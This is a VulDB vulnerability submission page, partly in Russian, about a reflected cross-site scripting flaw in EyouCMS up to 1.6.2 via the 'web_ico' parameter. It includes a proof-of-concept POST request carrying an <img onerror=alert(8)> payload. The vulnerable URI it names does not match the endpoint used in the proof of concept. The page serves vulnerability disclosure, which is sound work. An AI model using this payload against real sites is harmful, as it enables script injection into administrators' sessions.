Отправить #111320: eyoucms up to 1.6.2 'web_ico' reflected xss vulnerability Информация

Название	eyoucms up to 1.6.2 'web_ico' reflected xss vulnerability
Описание	eyoucms up to 1.6.2 has a xss vulnerability The vulnerable uri is /yxcms/index.php?r=admin/extendfield/mesedit&tabid=12&id=4 and the vulnerable multipart parameter is name="web_ico" POC below: POST /eyoucms/login.php?m=admin&c=System&a=web&lang=cn HTTP/1.1 *************************************************** ------WebKitFormBoundaryq3khRwDr0dBifJAy **************************************** ------WebKitFormBoundaryq3khRwDr0dBifJAy Content-Disposition: form-data; name="web_ico" <img src=1 onerror=alert(8)> ------WebKitFormBoundaryq3khRwDr0dBifJAy ******************************************** ------WebKitFormBoundaryq3khRwDr0dBifJAy-- see details at https://github.com/sleepyvv/vul_report/blob/main/EYOUCMS/XSS2.md
Источник	⚠️ https://www.eyoucms.com/
Пользователь	WWesleywww (UID 43117)
Представление	07.04.2023 15:36 (3 лет назад)
Модерация	14.04.2023 10:36 (7 days later)
Статус	принято
Запись VulDB	225943 [EyouCms до 1.6.2 HTTP POST Request mesedit&tabid=12&id=4 web_ico межсайтовый скриптинг]
Баллы	17

Want to stay up to date on a daily basis?

Enable the mail alert feature now!